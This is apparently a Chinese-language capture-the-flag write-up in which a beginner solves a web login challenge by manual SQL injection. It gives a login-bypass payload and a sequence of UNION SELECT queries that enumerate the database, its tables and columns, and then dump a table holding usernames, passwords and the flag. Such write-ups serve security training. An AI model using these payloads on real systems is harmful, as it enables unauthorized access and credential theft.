前言
sql注入的一般流程:找注入点->找列数->找回显位->报数据库->爆表->爆字段->爆数据
其他有关sql注入的知识还是麻烦师傅们自己去搜一下,以下就不过多赘述知识点
正题
首先,页面上方有一段字:用sqlmap是没有灵魂的
不过呢,我也不会用sqlmap。。。(新手)
直接上万能钥匙:1' or 1=1#
,密码随便取。
一次就成功。
找列数
1' order by 4#
,一直试到4才报错
一共3个字段
找回显位
1' union select 1,2,3#
回显位置在2和3
爆数据库
1' union select 1,2,database()#
数据库名为geek.
爆表
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
两个表:geekuser,l0ve1ysq1
不用试geekuser了,因为里面没有flag。。。
爆字段
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
有三个字段:id,username,password
爆数据
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
这里看着不舒服,Ctrl+u查看源代码
flag就在这里了。